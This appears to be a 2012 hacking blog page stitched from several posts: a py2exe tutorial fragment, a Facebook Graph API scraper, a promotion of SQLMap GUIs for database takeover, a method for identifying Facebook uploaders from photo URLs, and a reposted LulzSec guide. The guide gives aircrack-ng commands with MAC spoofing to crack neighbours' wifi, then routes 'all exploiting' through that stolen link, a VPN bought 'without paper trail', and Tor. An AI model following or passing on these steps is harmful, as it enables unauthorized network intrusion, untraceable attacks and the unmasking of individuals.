byte-compiling C:\Python27\lib\encodings\iso8859_15.py to encodings\iso88
byte-compiling C:\Python27\lib\encodings\iso8859_16.py to encodings\iso88
byte-compiling C:\Python27\lib\encodings\iso8859_2.py to encodings\iso885
byte-compiling C:\Python27\lib\encodings\iso8859_3.py to encodings\iso885
byte-compiling C:\Python27\lib\encodings\iso8859_4.py to encodings\iso885
byte-compiling C:\Python27\lib\encodings\iso8859_5.py to encodings\iso885
byte-compiling C:\Python27\lib\encodings\iso8859_6.py to encodings\iso885
byte-compiling C:\Python27\lib\encodings\iso8859_7.py to encodings\iso885
byte-compiling C:\Python27\lib\encodings\iso8859_8.py to encodings\iso885
byte-compiling C:\Python27\lib\encodings\iso8859_9.py to encodings\iso885
byte-compiling C:\Python27\lib\encodings\johab.py to encodings\johab.pyc
byte-compiling C:\Python27\lib\encodings\koi8_r.py to encodings\koi8_r.py
byte-compiling C:\Python27\lib\encodings\koi8_u.py to encodings\koi8_u.py
byte-compiling C:\Python27\lib\encodings\latin_1.py to encodings\latin_1.
byte-compiling C:\Python27\lib\encodings\mac_arabic.py to encodings\mac_a
byte-compiling C:\Python27\lib\encodings\mac_centeuro.py to encodings\mac
byte-compiling C:\Python27\lib\encodings\mac_croatian.py to encodings\mac
byte-compiling C:\Python27\lib\encodings\mac_cyrillic.py to encodings\mac
byte-compiling C:\Python27\lib\encodings\mac_farsi.py to encodings\mac_fa
byte-compiling C:\Python27\lib\encodings\mac_greek.py to encodings\mac_gr
byte-compiling C:\Python27\lib\encodings\mac_iceland.py to encodings\mac_
byte-compiling C:\Python27\lib\encodings\mac_latin2.py to encodings\mac_l
byte-compiling C:\Python27\lib\encodings\mac_roman.py to encodings\mac_ro
byte-compiling C:\Python27\lib\encodings\mac_romanian.py to encodings\mac
byte-compiling C:\Python27\lib\encodings\mac_turkish.py to encodings\mac_
byte-compiling C:\Python27\lib\encodings\mbcs.py to encodings\mbcs.pyc
byte-compiling C:\Python27\lib\encodings\palmos.py to encodings\palmos.py
byte-compiling C:\Python27\lib\encodings\ptcp154.py to encodings\ptcp154.
byte-compiling C:\Python27\lib\encodings\punycode.py to encodings\punycod
byte-compiling C:\Python27\lib\encodings\quopri_codec.py to encodings\quo
byte-compiling C:\Python27\lib\encodings\raw_unicode_escape.py to encodin
byte-compiling C:\Python27\lib\encodings\rot_13.py to encodings\rot_13.py
byte-compiling C:\Python27\lib\encodings\shift_jis.py to encodings\shift_
byte-compiling C:\Python27\lib\encodings\shift_jis_2004.py to encodings\s
byte-compiling C:\Python27\lib\encodings\shift_jisx0213.py to encodings\s
byte-compiling C:\Python27\lib\encodings\string_escape.py to encodings\st
byte-compiling C:\Python27\lib\encodings\tis_620.py to encodings\tis_620.
byte-compiling C:\Python27\lib\encodings\undefined.py to encodings\undefi
byte-compiling C:\Python27\lib\encodings\unicode_escape.py to encodings\u
byte-compiling C:\Python27\lib\encodings\unicode_internal.py to encodings
byte-compiling C:\Python27\lib\encodings\utf_16.py to encodings\utf_16.py
byte-compiling C:\Python27\lib\encodings\utf_16_be.py to encodings\utf_16
byte-compiling C:\Python27\lib\encodings\utf_16_le.py to encodings\utf_16
byte-compiling C:\Python27\lib\encodings\utf_32.py to encodings\utf_32.py
byte-compiling C:\Python27\lib\encodings\utf_32_be.py to encodings\utf_32
byte-compiling C:\Python27\lib\encodings\utf_32_le.py to encodings\utf_32
byte-compiling C:\Python27\lib\encodings\utf_7.py to encodings\utf_7.pyc
byte-compiling C:\Python27\lib\encodings\utf_8.py to encodings\utf_8.pyc
byte-compiling C:\Python27\lib\encodings\utf_8_sig.py to encodings\utf_8_
byte-compiling C:\Python27\lib\encodings\uu_codec.py to encodings\uu_code
byte-compiling C:\Python27\lib\encodings\zlib_codec.py to encodings\zlib_
byte-compiling C:\Python27\lib\fnmatch.py to fnmatch.pyc
byte-compiling C:\Python27\lib\ftplib.py to ftplib.pyc
byte-compiling C:\Python27\lib\functools.py to functools.pyc
byte-compiling C:\Python27\lib\genericpath.py to genericpath.pyc
byte-compiling C:\Python27\lib\getopt.py to getopt.pyc
byte-compiling C:\Python27\lib\getpass.py to getpass.pyc
byte-compiling C:\Python27\lib\gettext.py to gettext.pyc
byte-compiling C:\Python27\lib\hashlib.py to hashlib.pyc
byte-compiling C:\Python27\lib\heapq.py to heapq.pyc
byte-compiling C:\Python27\lib\httplib.py to httplib.pyc
byte-compiling C:\Python27\lib\inspect.py to inspect.pyc
byte-compiling C:\Python27\lib\keyword.py to keyword.pyc
byte-compiling C:\Python27\lib\linecache.py to linecache.pyc
byte-compiling C:\Python27\lib\locale.py to locale.pyc
byte-compiling C:\Python27\lib\logging\__init__.py to logging\__init__.py
creating C:\Python27\build\bdist.win32\winexe\collect-2.7\logging
byte-compiling C:\Python27\lib\mimetools.py to mimetools.pyc
byte-compiling C:\Python27\lib\mimetypes.py to mimetypes.pyc
byte-compiling C:\Python27\lib\ntpath.py to ntpath.pyc
byte-compiling C:\Python27\lib\nturl2path.py to nturl2path.pyc
byte-compiling C:\Python27\lib\opcode.py to opcode.pyc
byte-compiling C:\Python27\lib\optparse.py to optparse.pyc
byte-compiling C:\Python27\lib\os.py to os.pyc
byte-compiling C:\Python27\lib\os2emxpath.py to os2emxpath.pyc
byte-compiling C:\Python27\lib\pdb.py to pdb.pyc
byte-compiling C:\Python27\lib\pickle.py to pickle.pyc
byte-compiling C:\Python27\lib\posixpath.py to posixpath.pyc
byte-compiling C:\Python27\lib\pprint.py to pprint.pyc
byte-compiling C:\Python27\lib\quopri.py to quopri.pyc
byte-compiling C:\Python27\lib\random.py to random.pyc
byte-compiling C:\Python27\lib\re.py to re.pyc
byte-compiling C:\Python27\lib\repr.py to repr.pyc
byte-compiling C:\Python27\lib\rfc822.py to rfc822.pyc
byte-compiling C:\Python27\lib\shlex.py to shlex.pyc
byte-compiling C:\Python27\lib\socket.py to socket.pyc
byte-compiling C:\Python27\lib\sre.py to sre.pyc
byte-compiling C:\Python27\lib\sre_compile.py to sre_compile.pyc
byte-compiling C:\Python27\lib\sre_constants.py to sre_constants.pyc
byte-compiling C:\Python27\lib\sre_parse.py to sre_parse.pyc
byte-compiling C:\Python27\lib\ssl.py to ssl.pyc
byte-compiling C:\Python27\lib\stat.py to stat.pyc
byte-compiling C:\Python27\lib\string.py to string.pyc
byte-compiling C:\Python27\lib\stringprep.py to stringprep.pyc
byte-compiling C:\Python27\lib\struct.py to struct.pyc
byte-compiling C:\Python27\lib\subprocess.py to subprocess.pyc
byte-compiling C:\Python27\lib\tempfile.py to tempfile.pyc
byte-compiling C:\Python27\lib\textwrap.py to textwrap.pyc
byte-compiling C:\Python27\lib\threading.py to threading.pyc
byte-compiling C:\Python27\lib\token.py to token.pyc
byte-compiling C:\Python27\lib\tokenize.py to tokenize.pyc
byte-compiling C:\Python27\lib\traceback.py to traceback.pyc
byte-compiling C:\Python27\lib\types.py to types.pyc
byte-compiling C:\Python27\lib\unittest\__init__.py to unittest\__init__.
creating C:\Python27\build\bdist.win32\winexe\collect-2.7\unittest
byte-compiling C:\Python27\lib\unittest\case.py to unittest\case.pyc
byte-compiling C:\Python27\lib\unittest\loader.py to unittest\loader.pyc
byte-compiling C:\Python27\lib\unittest\main.py to unittest\main.pyc
byte-compiling C:\Python27\lib\unittest\result.py to unittest\result.pyc
byte-compiling C:\Python27\lib\unittest\runner.py to unittest\runner.pyc
byte-compiling C:\Python27\lib\unittest\signals.py to unittest\signals.py
byte-compiling C:\Python27\lib\unittest\suite.py to unittest\suite.pyc
byte-compiling C:\Python27\lib\unittest\util.py to unittest\util.pyc
byte-compiling C:\Python27\lib\urllib.py to urllib.pyc
byte-compiling C:\Python27\lib\urlparse.py to urlparse.pyc
byte-compiling C:\Python27\lib\uu.py to uu.pyc
byte-compiling C:\Python27\lib\warnings.py to warnings.pyc
byte-compiling C:\Python27\lib\weakref.py to weakref.pyc
*** copy extensions ***
copying C:\Python27\DLLs\_hashlib.pyd -> C:\Python27\dist
copying C:\Python27\DLLs\_socket.pyd -> C:\Python27\dist
copying C:\Python27\DLLs\_ssl.pyd -> C:\Python27\dist
copying C:\Python27\DLLs\bz2.pyd -> C:\Python27\dist
copying C:\Python27\DLLs\select.pyd -> C:\Python27\dist
copying C:\Python27\DLLs\unicodedata.pyd -> C:\Python27\dist
*** copy dlls ***
copying C:\Python27\w9xpopen.exe -> C:\Python27\dist
copying C:\WINDOWS\system32\python27.dll -> C:\Python27\dist
setting sys.winver for 'C:\Python27\dist\python27.dll' to 'py2exe'
copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Python27\dist\
The following modules appear to be missing
['_scproxy']

*** binary dependencies ***
Your executable(s) also depend on these dlls which are not included,
you may or may not need to distribute them.

Make sure you have the license if you distribute any of them, and
make sure you don't distribute files belonging to the operating system.

   WS2_32.dll - C:\WINDOWS\system32\WS2_32.dll
   SHELL32.dll - C:\WINDOWS\system32\SHELL32.dll
   USER32.dll - C:\WINDOWS\system32\USER32.dll
   ADVAPI32.dll - C:\WINDOWS\system32\ADVAPI32.dll
   KERNEL32.dll - C:\WINDOWS\system32\KERNEL32.dll
C:\Tutorial>
Two directories will be created when you run your setup script, build and dist. The build directory is used as working space while your application is being packaged. It is safe to delete the build directory after your setup script has finished running. The files in the dist directory are the ones needed to run your application.

Test your executable

Now that the package has been created it is ready to test: (the exe file will be in dist folder)
C:\Tutorial>cd dist

C:\Tutorial\dist>hello.exe
Hello World
Excellent, it works!!!

Providing the Microsoft Visual C runtime DLL

The Python interpreter was compiled using Microsoft Visual C, so your new program needs the Microsoft Visual C runtime DLL to run. If you have installed appropriate versions of Python or Visual Studio, then you will already have this DLL on your computer. If some of your users might not already have this DLL, then they will not be able to run your program. The methods you may use to solve this depend on the version of Python you are using:

 Python 2.4 or 2.5

If you are using Python 2.4 or 2.5, then the DLL you need is called MSVCR71.dll. This DLL will probably already have been included in your dist directory, in which case you need do nothing more.
However, the copyright on this file is owned by Microsoft, and you need to check whether you have the legal right to redistribute it. If you have a copy of Visual Studio, check the file redist.txt provided within the installation to see whether you have redistribution rights for this DLL. Generally you have the right to redistribute it if you own a license for Microsoft Visual C++, but not if you use the Express Editions.
If you do not have the rights to redistribute MSVCR71.dll, then your users must install it for themselves, using the Microsoft Visual C++ 2005 Redistributable Package (vcredist_x86.exe).
Either you can instruct your users to download and run this themselves, or you could create an installer for your application (see Step 6 below), that includes vcredist_x86.exe (which is itself redistributable by anyone), and then run that as part of your application installation.

 Python 2.6, 2.7, 3.0, 3.1

For Python 2.6, the DLL you need is called MSVCR90.dll. Py2exe is not able to automatically include this DLL in your dist directory, so you must provide it yourself.
To complicate things, there is more than one version of this DLL in existance, each with the same filename. You need the same version that the Python interpreter was compiled with, which is version 9.0.21022.8. Through the remainder of these instructions, hover your mouse over the dll file (or the vcredist_x86.exe installer executable) to confirm which version you've got. You'll need the vcredist_x86.exe that contains the Microsoft Visual C++ 2008 Redistributable Package published 29-11-2007, so not the VS2008 SP1 one (tested with Python 2.7.1).
As for older versions of Python, you need to check redist.txt within your Visual Studio installation to see whether you have the legal right to redistribute this DLL. If you do have these rights, then you have the option to bundle the C runtime DLL with you application. If you don't have the rights, then you must have your users run the redistributable C runtime installer on their machines.

 Bundling the C runtime DLL

If you do have the rights to redistribute MSVCR90.dll, there should be a copy of it in your Visual Studio install, under VC\redist\x86\Microsoft.VC90.CRT. Since Visual Studio 2008, you can't just copy this DLL file - you also need the manifest file that you'll find there. The redist.txt file states that you must distribute all three dlls and the unmodified manifest file and it is a violation of the license agreement to distribute only one of the dlls without the others (though py2exe only needs MSVCR90.dll.) The pertinent passage from the redist.txt file is as follows:
  • "For your convenience, we have provided the following folders for use when redistributing VC++ runtime files. Subject to the license terms for the software, you may redistribute the folder (unmodified) in the application local folder as a sub-folder with no change to the folder name. You may also redistribute all the files (*.dll and *.manifest) within a folder, listed below the folder for your convenience, as an entire set."
You must make py2exe copy the three dlls and the manifest file into your project's dist directory, in a subdirectory called 'Microsoft.VC90.CRT'. To achieve this, add a data_files option to your project's setup.py:
  from glob import glob
  data_files = [("Microsoft.VC90.CRT", glob(r'C:\Program Files\Microsoft Visual Studio 9.0\VC\redist\x86\Microsoft.VC90.CRT\*.*'))]
  setup(
    data_files=data_files,
    etc
  )
With this in place, running py2exe should put the files into your dist directory:
  dist
  |
  +-Microsoft.VC90.CRT
  | |
  | +-Microsoft.VC90.CRT.manifest
  | +-msvcm90.dll
  | +-msvcp90.dll
  | +-msvcr90.dll
  |
  |-etc
Now, simply copying the whole dist directory to your users machines should now allow your application to run, even on machines that don't have their own copy of the C++ runtime.
Note that this method of including the C runtime is used by several Visual C++ applications - if you search your Program Files folder for msvcr90.dll, you may find several applications that have this DLL and the associated manifest bundled alongside their executable like this.
Also note that despite all the above, py2exe will complain that it cannot find MSVCP90.dll. You must edit your setup.py to add the path to the dlls to the sys.path, e.g.
    sys.path.append("C:\\Program Files\\Microsoft Visual Studio 9.0\\VC\\redist\\x86\\Microsoft.VC90.CRT")

win32ui special case

win32ui needs MFC DLLs to run .exe, see Py2exeAndWin32ui for extra informations

Running the redistributable C runtime installer

If you don't have rights to redistribute MSVCR90.dll, then your users may install it on their machine by running the Microsoft Visual C++ 2008 Redistributable Package (vcredist_x86.exe). It is important not to use the SP1 version of this installer, which contains the wrong version of MSVCR90.dll.
Either you can instruct  users to download and run this themselves, or you could create an installer for your application , that includes vcredist_x86.exe (which is itself redistributable by anyone), and then run that as part of your application installation.
The installer puts a copy of the DLLs in the directory C:\WINDOWS\WinSxS (XP), inside subdirectories with mangled names. The manifest file is in the 'Manifests' subdirectory, again this will have a mangled filename. You can still discern the text 'Microsoft.VC90.CRT' and '9.0.21022.8' within the mangled file and directory names, to find the files. It is possible to take a copy of these files and remove the filename mangling, to embed them in your application as described in 5.2.1.

6. Build an installer if applicable

py2exe is not an installer builder - it merely assembles the files needed to run your Python program. There are plenty of good installer builders out there including some that are open source (e.g., NSIS) and some that are free (e.g., Inno Setup).

Thursday, March 29, 2012

python program to get facebook users data


hi guys  after 3 days of python learning i wrote my first prgram which downloads a users info (public one) using graph API its very useful API



It can be accessed like this 
Users: https://graph.facebook.com/btaylor (Bret Taylor)
Pages: https://graph.facebook.com/cocacola (Coca-Cola page)
Events: https://graph.facebook.com/251906384206 (Facebook Developer Garage Austin)
Groups: https://graph.facebook.com/195466193802264 (Facebook Developers group)
Applications: https://graph.facebook.com/2439131959 (the Graffiti app)
Status messages: https://graph.facebook.com/367501354973 (A status message from Bret)
Photos: https://graph.facebook.com/98423808305 (A photo from the Coca-Cola page)
Photo albums: https://graph.facebook.com/99394368305 (Coca-Cola's wall photos)
Profile pictures: https://graph.facebook.com/Rjcrystal.ica/picture (your profile picture)
Videos: https://graph.facebook.com/817129783203 (A Facebook tech talk on Graph API)
Notes: https://graph.facebook.com/122788341354 (Note announcing Facebook for iPhone 3.0)
Checkins: https://graph.facebook.com/414866888308 (Check-in at a pizzeria)
so just we need to put a ID after 
code
# -*- coding: utf-8 -*-
# Python
print                                             "##########################################"
print                                             "#  coded by Rjcrystal                                                 #"
print                                             "#  technomaina.blogspot.com                                     #"
print                                             "#  licensed under creative commons 2.5                      #"
print                                             "#  feedback:rjcrystal@gmail.com,                               #"
print                                             "# put group,page,profile ID                                        #"
print                                             "##########################################"

from urllib import urlopen
s = raw_input('put ID,name,etc-->')
print urlopen("http://graph.facebook.com/" + s).read()
so the problem with this is i am getting the result in 1 line only
and it adds extra' \' with every '/' but this is a great sucess for me :)
this will ask for a input just put your ID or anything to this and you will get all of its public INFO
have fun
:D

Netsniff-NG High Performance Sniffer 0.5.6

netsniff-ng is a free, performant Linux networking toolkit. The gain of performance is reached by zero-copy mechanisms, so that on packet reception and transmission the kernel does not need to copy packets from kernel space to user space and vice versa. For this purpose, the netsniff-ng toolkit is libpcap independent, but neverthelesssupports the pcap file format for capturing, replaying and performing offline-analysis of pcap dumps. Furthermore, we are focussing on building a robust and clean analyzer and utilities that complete netsniff-ng asa support for network development, debugging or network reconnaissance. The netsniff-ng toolkit consists of the following utilities: *. netsniff-ng , a zero-copy analyzer, pcap capturer and replayer *. trafgen , a high-performance zero-copynetwork traffic generator *. bpfc , a Berkeley Packet Filter compiler supporting Linux extensions *. ifpps , a top-like kernel networking and system statistics tool *. flowtop , a top-like netfilter connection tracking tool *. curvetun , a lightweight multiuser IPtunnel based on elliptic curve cryptography *. ashunt , an Autonomous System (AS) trace route and ISP testing utility (Note: libpcap starting from 1.0.0 now also supports zero-copy, but for capturing only! netsniff-ng's pcap files can also be opened with tools like Wireshark , and vice versa!) download Git repository: git clone git://github.com/gnumaniacs/netsniff-ng.git Git web: http://src.netsniff-ng.org/

Monday, March 26, 2012

SQLMap Gui - Automatic SQL injection and database takeover tool


This is a awesome sqlmap python gui made by xcedz.To make it work get andinstall python 2.7 and download the last version of sqlMap-dev
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmapsqlMap-dev
after doing that download the gui scriptfrom :
http://code.google.com/p/gui-for-sqlmap/downloads/list
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, toaccessing the underlying file system andexecuting commands on the operating system via out-of-band connections.
And here is Another Windows GUI forsqlmap written in C#
you have to enter the database parameters, select the table and column that you want to enumerate and press Exploit. SQL Map GUI will do the rest!
Honestly I recommend you python version because works better!
(Via the projectx blog official dev=>http://security-sh3ll.blogspot.com/)
p.s >this was not made by me

how to find someones profile ID from photo links

i know you have some idea that in deface pages people put their photo graphs with messages or sometimes if you wanna know who uploaded this photo to facebook then open the URL of image
then see the middle number for eg for this one
www.some.fcbdn.akamahid.net/216512_204732556226334_100000687732419_582854_6270883_n.jpg etc
the highlighted one is our profile ID
then how to get info for that ID so we use facebook graph API so goto
http://graph.facebook.com/?id=  then put what you got and yes you got the user info you can simply search him/her on facebook
and if you have a URL of photo with all facebook like,tag stuff then it will look like this so the highlighted portion is your ID

photo.php?fbid=231188996914023&set=a.231188663580723.62289.100000687732419&type=3

i am also thinking same about blogger and twitter any ideas what do you say guys
this also works for pages, and profiles only

Friday, March 23, 2012

how to be a Ghost on internet by lulzsec

Its a very interesting post by lulzec members i would like to share it


Want to stay safe online?

By @AntiSecOp

Required files:VMWare Workstation:

http://www.demonoid.me/files/details/2787488/008172892720/Windows 7 Ultimate: http://www.demonoid.me/files/details/2811393/003064834770/BackTrack 5 R1 VMWare: http://www.backtrack-linux.org/ajax/download_redirect.php?id=BT5R1-GNOME-VM-32.7zpfsense: http://files.chi.pfsense.org/mirror/downloads/pfSense-2.0.1-RELEASE-amd64.iso.gzUbuntu Live CD: http://www.ubuntu.com/start-download?distro=desktop&bits=32&release=latest


Required Hardware:
Virtualization supported CPU
4GB RAM
USB wifi adapter supporting packet injection:http://www.amazon.com/Alfa-802-11b-Wireless-Original-9dBi/dp/B001O9X9EU/ref=sr_1_2?ie=UTF8&qid=1328768355&sr=8-2


VPN Account without paper trail
  • Purchase prepaid visa card with cash
  • Purchase Bitcoins with Money Order
  • Donate Bitcoins to different account
  • Purchase VPN account with bitcoins


VPN ServicesoVPN.to
  • www.CCHeaven.in
  • https://www.vpntunnel.se/ 
  • https://www.ipredator.se/?lang=en 
  • http://strongvpn.com/



Step One
  • Enable Boot and Setup page BIOS password
  • Turn computer on, press key to enter Setup. Usually F1, F2, F11, Del, something similar. Then go to the Security tab


Step Two
  • Boot Ubuntu LiveCD to cleanly wipe hard drive
  • After booting LiveCD, open up terminal and type sudo "fdisk -l" to get a list of disks and partitions
  • Use the wipe command on each partition that is listed with the above commandie "sudo wipe /dev/sda1"
  • Repeat for each drive (sdb, sdc) and each partition (sda1, sda2)
  • Reboot


Step Three
  • Install Windows 7 Ultimate and shred free space
  • Boot from Windows disk and install
  • After clean install, install fileshredder http://www.fileshredder.org
  • Run fileshredder using "Secure Erasing Algorithm with 7 passes"Reboot
  • Enable BitLocker drive encryption. Safe key to USB stick
  • Reboot
  • Run Windows Update
  • Turn off Swap space (Control Panel > System and Security > Advanced > Performance > Disable Virtual Memory
  • Reboot


Step Four
Install VMWare  


Step Five
  • BackTrack 5 R1 Virtual Machine to be used for cracking WiFi
  • Open VMWare and import the BackTrack 5 R1 VMWare image (link above)
  • Set VM to 256MB RAM
  • Create a Network Adapter (VMNet0)
  • Directly attach USB wifi adapter (VM > Removable Devices > Check Wireless Adapter)
  • Bridge eth0 to wlan0

Easy Mode method:
  • apt-get -y install network-manager
  • rm /etc/network/interfaces
  • reboot
  • Open Network Manager
  • eth0 IPv4 Settings > Method > Shared to other computers

  • Use aircrack-ng to crack surrounding AP's
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger --mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
  • airodump-ng wlan0
  • Get SSID and channel for next step
  • airodump-ng -c (channel #) -w (file name) --bssid (bssid) wlan0
  • Let this sit until you have plenty of data points
  • aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
  • Look for successful ACK
  • aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  • Also let this run for a while, look for 10k ACK's aircrack-ng -b (bssid) (file name-01.cap)
  • Connect to SSID


Step Six
  • Pfsense install to use VPN
  • 8 GB of Hard Drive space
  • 256MB RAM
  • Two Network Adapters (VMnet0 and VMnet1)
  • After installing from the downloaded ISO, set WAN to VMnet0 and LAN to VMnet1. You should get a WAN dhcp IP from VM#1
  • Assign LAN IP and enable DHCP (192.168.1.1/24)

Step Seven
  • Install TorBox to anonymize ALL traffic
  • 128MB RAM
  • 5GB Hard Drive space
  • One Network Adapter (VMnet1)
  • Follow Torproject.org instructions for TorBox https://trac.torproject.org/projects/tor/wiki/doc/TorBOX
  • Open a browser and go to http://192.168.1.1
  • Login to pfsense with admin/pfsense and change password, force https, and enable all logging
  • Go to PPTP VPN Tab and input info from VPN info above


Step Eight
  • BackTrack 5 R1 VM for all cracking/penetration testing/everything
  • Import another BT5 vmware image
  • 512MB RAM
  • One Network Adapter (VMnet1)
  • Set default Gateway to match the IP of your previous VM (TorBox)
  • ALL data will now travel securely (BT5 > Tor Network > Over VPN > Internet using cracked wifi)
  • Download Tor Bundle from torproject.org
  • Use FireFox Portable bunlded with Tor Bundle (more secure)
  • All exploiting/penetration testing, cracking, etc is done on this VM


Step Nine
Encrypt All VM's
Open settings for Each VM in VMWare
Under Options > Enable Encryption
Set secure password

Torchat: OfflineE-mail: antisec@tormail.net

Twitter: https://twitter.com/AntiSecOp

Twitter Delicious Facebook Digg Stumbleupon Favorites More